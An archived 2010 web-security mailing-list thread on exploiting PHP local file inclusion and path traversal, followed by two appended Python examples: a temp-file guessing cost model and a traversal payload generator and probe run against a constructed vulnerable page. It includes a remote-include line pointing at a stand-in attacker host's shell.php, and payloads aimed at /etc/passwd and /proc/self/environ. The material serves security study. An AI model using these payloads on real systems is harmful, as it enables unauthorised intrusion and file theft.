[WEB SECURITY] local file inclusion and path transversal

kuza55 kuza55 at gmail.com
Tue Feb 16 00:58:57 EST 2010


I haven't done this stuff in a while, so I'm not sure how accurate
this is any more, but non-URL stream wrappers worked a while back as a
way to do RFIs:
http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html

UNC paths (\\www.evil.com\shell.php) on Windows probably work too,
since I'm pretty sure PHP just passes things down to the OS if it
doesn't see a stream wrapper - but I haven't tested that (though
almost no-one runs PHP on Windows, so this suggestion may be useless).

If anyone is interested, ascii wrote up a (much more in depth) article
about the /proc/self/fd method described in the paper a while ago:
http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/

It also has some information & links to other interesting methods.

Also, while I never liked the method, it is possible to abuse the fact
that PHP allows gratuitous file uploads: simply make a file
upload-style request and try to guess the filename in /tmp (or the
Windows equivalent). There are a bunch of optimisations (I've heard
that interpreter crashes stop the files from being deleted, so you can
create sqrt(n) files - where n is your search space - and then guess
one, with 50% probability in sqrt(n)/2 complexity; also this technique
works better on Windows since your n is smaller), but you're going to
need to work that out yourself if you want to use it. However, there
was a recent-ish advisory about some file upload DoS in PHP that, iirc,
had some info that may be relevant to this.

P.S. To David Jacoby: please don't claim that "This document will
explain a few different new ways" when it is clear you've found all
the information via Google. (Either that or you can't seem to use
Google to determine that nothing in your "whitepaper" is new.)
Having said that, summary papers are useful when they are either
complete, or can compare the various techniques against each other, or
are well written; sadly your paper is none of these.

GTF off my lawn kids,
 - kuza55
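The temp-file guessing idea above is a cost question, so here is a small cost model for it. This is an added example, not code from the thread or from any of its authors. It sizes the temporary-name space per platform, computes the exact probability that a number of distinct guesses hits one of the planted files, and finds the number of planted files that minimises uploads plus guesses, which is where the sqrt(n) figure comes from. The name formats are assumptions not stated in the thread: Windows temporary names of the form php<4 hex digits>.tmp (GetTempFileName) and Linux names of the form php<6 chars from [A-Za-z0-9]> (mkstemp); the model also assumes, as the post does, that planted files survive because the interpreter crashed before cleaning them up.

```python
"""Cost model for guessing PHP upload temp-file names (added example)."""
import math

# Assumed name templates (prefix, alphabet, random length, suffix).
# Only the alphabet size and random length matter for the maths.
NAME_SPACES = {
    "windows": ("php", "0123456789ABCDEF", 4, ".tmp"),
    "linux": ("php",
              "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
              6, ""),
}


def name_space_size(platform: str) -> int:
    """n: how many distinct names the platform's template can produce."""
    _, alphabet, length, _ = NAME_SPACES[platform]
    return len(alphabet) ** length


def candidate_name(platform: str, index: int) -> str:
    """The index-th name (0 <= index < n), so a guessing loop can walk the
    space in any order without ever repeating a name."""
    prefix, alphabet, length, suffix = NAME_SPACES[platform]
    if not 0 <= index < len(alphabet) ** length:
        raise ValueError("index outside the name space")
    chars = []
    for _ in range(length):
        index, digit = divmod(index, len(alphabet))
        chars.append(alphabet[digit])
    return prefix + "".join(reversed(chars)) + suffix


def _log_choose(a: int, b: int) -> float:
    """ln C(a, b) via lgamma, to avoid huge integers for the Linux space."""
    return math.lgamma(a + 1) - math.lgamma(b + 1) - math.lgamma(a - b + 1)


def hit_probability(n: int, k: int, guesses: int) -> float:
    """P(at least one hit) when `guesses` distinct names are tried out of n
    and k of the n are planted: 1 - C(n-k, g) / C(n, g) (hypergeometric,
    zero successes)."""
    if guesses > n - k:
        return 1.0
    log_miss = _log_choose(n - k, guesses) - _log_choose(n, guesses)
    return 1.0 - math.exp(log_miss)


def guesses_for_probability(n: int, k: int, target: float = 0.5) -> int:
    """Smallest guess count whose hit probability reaches `target`; binary
    search is valid because the probability grows with the guess count."""
    lo, hi = 1, n - k + 1
    while lo < hi:
        mid = (lo + hi) // 2
        if hit_probability(n, k, mid) >= target:
            hi = mid
        else:
            lo = mid + 1
    return lo


def expected_guesses(n: int, k: int) -> float:
    """Mean guesses until the first hit, without replacement: (n+1)/(k+1)."""
    return (n + 1) / (k + 1)


def optimal_plants(n: int) -> int:
    """k minimising k uploads + expected guesses.  The cost is convex in k
    with its minimum at k + 1 = sqrt(n + 1), so only the integers around
    that point need checking; the answer is about sqrt(n)."""
    s = math.isqrt(n + 1) - 1
    return min(range(max(1, s - 2), s + 3),
               key=lambda k: k + expected_guesses(n, k))


def plan(platform: str) -> dict:
    """Summarise the attack cost for one platform."""
    n = name_space_size(platform)
    k = optimal_plants(n)
    return {
        "names": n,
        "plant": k,
        "expected_guesses": expected_guesses(n, k),
        "guesses_for_50pct": guesses_for_probability(n, k),
        "total_work": k + expected_guesses(n, k),
    }


if __name__ == "__main__":
    for name in NAME_SPACES:
        print(name, plan(name))
```

Running it shows why the post says the trick works better on Windows: the assumed 16^4 name space needs a few hundred uploads plus a few hundred include attempts in total, while the 62^6 Linux space needs hundreds of thousands of each even with the optimal number of planted files.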

2010/2/15 David Jacoby <David.Jacoby at truesec.se>:
> Hey Guys,
>
> I published a whitepaper not so long ago about how to get command execution through file inclusion vulnerabilities in PHP-based web applications through log poisoning attacks via /proc on *NIX-based operating systems.
>
> http://www.vulndev.se/alternatrive-ways-to-exploit-file-include.pdf
>
> I will update it some day with some SELinux (default policy) bypassing stuff.
>
> Best regards,
> David Jacoby
>
>
>
> --------------------------------------------------------------------------------
> David Jacoby - Truesec AB
> Unix/Linux and alternative systems
>
> Mobil: +46-(0)709-183011
> --------------------------------------------------------------------------------
>
> ________________________________________
> From: Daniele Bellucci [daniele.bellucci at gmail.com]
> Sent: 14 February 2010 20:17
> To: Miguel González Castaños
> Cc: websecurity at webappsec.org
> Subject: Re: [WEB SECURITY] local file inclusion and path transversal
>
> Have a look at wfuzz, then the wordlist:
> http://www.ikkisoft.com/stuff/dirTraversal.txt
>
>
> 2010/2/14 Miguel González Castaños <miguel_3_gonzalez at yahoo.es>:
>> Hi all,
>>
>>  I keep on studying different hacking techniques. The next assignment is to
>> scan a website to find local file inclusion and path traversal
>> vulnerabilities. I have used the free editions of n-stalker, acunetix and
>> nikto and I haven't found anything. Is there any howto or (free) vulnerability
>> scanner any of you would recommend?
>>
>>  Thanks,
>>
>>  Miguel
>>
>> ----------------------------------------------------------------------------
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>

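For the scanning question that started the thread, and the wfuzz-plus-wordlist answer to it, here is what such a fuzzing loop has to do. This is an added example; it is not code from the thread, from wfuzz, or from any scanner named above. It generates the traversal candidates a wordlist-driven fuzzer would send, decides from the response body whether the requested file really came back (rather than just a 200 status), and drives the loop through a pluggable `send` callable, so it runs offline against the constructed vulnerable page at the bottom and, with a `send` that performs real HTTP requests, against a target you are authorised to test. The parameter name `page`, the include root /var/www/pages and the sample file contents are assumptions made for the example.

```python
"""LFI / path traversal probe with a pluggable transport (added example)."""
import posixpath
import re
from typing import Callable, Dict, Iterator, List
from urllib.parse import quote, unquote

# Content that proves a particular file was included; probing for files
# without a stable signature only produces noise.
SIGNATURES = {
    "/etc/passwd": re.compile(rb"^root:[^:]*:0:0:", re.M),
    "/proc/self/environ": re.compile(rb"(?:SCRIPT_FILENAME|DOCUMENT_ROOT)="),
    "C:/Windows/win.ini": re.compile(rb"^\[fonts\]", re.M | re.I),
}


def traversal_candidates(target: str, max_depth: int = 8) -> Iterator[str]:
    """Yield payloads in the order a wordlist would, for 1..max_depth parent
    hops: raw, URL-encoded once, URL-encoded twice, and with a trailing %00
    (PHP before 5.3.4 truncates the path there, which defeats an appended
    extension such as '.php')."""
    rel = re.sub(r"^(?:[A-Za-z]:)?/+", "", target)   # strip root or drive
    for depth in range(1, max_depth + 1):
        # '....//' survives an application that strips '../' exactly once
        for hop in ("../", "..\\", "....//"):
            raw = hop * depth + rel
            yield raw
            yield quote(raw, safe="")
            yield quote(quote(raw, safe=""), safe="")
            yield raw + "%00"


def included(body: bytes, target: str) -> bool:
    """True when the body carries the target file's signature."""
    sig = SIGNATURES.get(target)
    return bool(sig and sig.search(body))


def probe(send: Callable[[str], bytes], target: str = "/etc/passwd",
          max_depth: int = 8) -> List[str]:
    """Return every payload whose response proves `target` was included."""
    return [p for p in traversal_candidates(target, max_depth)
            if included(send(p), target)]


# --- constructed target, standing in for include($_GET['page']) ------------
PAGES = "/var/www/pages"                     # assumed include root
FAKE_FS: Dict[str, bytes] = {                # constructed sample files
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"
                   b"www-data:x:33:33::/var/www:/bin/sh\n",
    PAGES + "/home": b"<h1>home</h1>",
}


def vulnerable_send(payload: str) -> bytes:
    """Joins the parameter (decoded once, as the web server would) onto the
    page directory with no check that the result stays inside it."""
    path = posixpath.normpath(PAGES + "/" + unquote(payload))
    return FAKE_FS.get(path, b"<h1>404</h1>")


def hardened_send(payload: str) -> bytes:
    """Same lookup, but the normalised path must remain under PAGES."""
    path = posixpath.normpath(PAGES + "/" + unquote(payload))
    if path != PAGES and not path.startswith(PAGES + "/"):
        return b"<h1>403</h1>"
    return FAKE_FS.get(path, b"<h1>404</h1>")


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_send))
    print("hardened:", probe(hardened_send))
```

Against the constructed page only the raw and singly-encoded payloads with at least three parent hops succeed; the double-encoded, backslash, `....//` and `%00` forms all miss, which is the point of sending the whole family rather than one guess. A real transport is a function that puts the payload into the query string unchanged (the candidates are already encoded as intended) and returns the response body as bytes.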